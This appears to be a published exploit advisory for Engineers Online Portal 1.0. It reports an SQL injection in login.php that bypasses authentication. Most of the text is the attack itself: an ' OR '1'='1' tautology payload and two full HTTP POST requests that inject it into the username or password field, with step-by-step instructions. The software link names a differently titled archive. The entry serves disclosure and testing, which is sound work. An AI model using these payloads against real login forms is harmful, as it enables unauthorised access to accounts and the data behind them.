# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Authentication Bypass# Exploit Author: Alon Leviev# Date: 22-10-2021# Category: Web application# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip# Version: 1.0# Tested on: Kali Linux # Vulnerable page: login.php# VUlnerable parameters: "username", "password"
Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal login form which can allow an attacker to bypass authentication.
Steps to exploit:1) Navigate to http://localhost/nia_munoz_monitoring_system/login.php
2) Insert your payload in the user or password field
3) Click login
Proof of concept (Poc):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -' OR '1'='1';------
POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept:*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length:41
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
username='+or+'1'%3D'1'%3B--+-&password=sqli
OR
POST /nia_munoz_monitoring_system/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept:*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length:44
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
username=sqli&password='+or+'1'%3D'1'%3B--+----
